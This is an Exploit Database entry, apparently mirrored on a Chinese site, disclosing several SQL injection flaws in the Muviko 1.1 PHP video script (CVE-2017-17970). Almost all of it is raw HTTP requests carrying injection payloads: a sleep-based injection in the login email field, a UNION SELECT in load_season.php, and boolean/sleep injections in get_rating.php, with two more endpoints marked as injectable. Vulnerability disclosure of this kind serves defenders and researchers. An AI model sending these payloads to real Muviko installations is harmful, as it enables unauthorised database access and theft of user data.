Muviko 1.1 – SQL Injection

• Exploit Database
• 111 阅读

• 作者： Ahmad Mahfouz
  日期： 2018-01-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/43477/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149

  # Exploit Title: Muviko 1.1 - Multiple SQL Injection # Exploit Author: Ahmad Mahfouz # Contact: http://twitter.com/eln1x # Date: 09/01/2018 # CVE: CVE-2017-17970 # Vendor Homepage: https://www.muvikoscript.com # Version: 1.1 # Tested on: Mac OS       --------------------------------------------------------------------------------------------------------   # SQL Injection: login.php form parameter [POST] email     POST /login.php HTTP/1.1   Host: localhost   User-Agent: Mozilla/5.0   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8   Accept-Language: en-US,en;q=0.5   Accept-Encoding: gzip, deflate   Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415   Connection: close   Upgrade-Insecure-Requests: 1   Content-Type: application/x-www-form-urlencoded   Content-Length: 45     email=admin@dmin.com'%2b(select*from(select(sleep(20)))a)%2b'&password=admxn&login=     --------------------------------------------------------------------------------------------------------   # SQL Injection: load_season.php form parameter [GET] season_id     GET /themes/flixer/ajax/load_season.php?season_id=-19'+union+all+select+1,2,3,4,5,6,7,8,9--+-&season_number=1 HTTP/1.1   Host: localhost   User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04   Accept: */*   Accept-Language: en-US,en;q=0.5   Accept-Encoding: gzip, deflate   X-Requested-With: XMLHttpRequest   Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415   Connection: close     --------------------------------------------------------------------------------------------------------     # SQL Injection get_raring.php parameter [GET] movie_id     GET /themes/flixer/ajax/get_rating.php?movie_id=9'+AND+SLEEP(5)+AND+'AAA'='AAA HTTP/1.1   Host: localhost   User-Agent: Mozilla/5.0   Accept: */*   Accept-Language: en-US,en;q=0.5   Accept-Encoding: gzip, deflate   X-Requested-With: XMLHttpRequest   Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415   Connection: close     --------------------------------------------------------------------------------------------------------   # SQL Injection update_rating.php parameters [GET] rating,movie_id     GET /themes/flixer/ajax/update_rating.php?movie_id=[SQL]&rating=[SQL] HTTP/1.1   Host: localhost   User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04   Accept: */*   Accept-Language: en-US,en;q=0.5   Accept-Encoding: gzip, deflate   X-Requested-With: XMLHttpRequest   Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415   Connection: close     --------------------------------------------------------------------------------------------------------   # SQL Injection set_player_source.php parameters [GET] id   GET /themes/flixer/ajax/set_player_source.php?id=[SQL]&is_series=1&is_embed=0 HTTP/1.1   Host: localhost   User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04   Accept: */*   Accept-Language: en-US,en;q=0.5   Accept-Encoding: gzip, deflate   X-Requested-With: XMLHttpRequest   Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415   Connection: close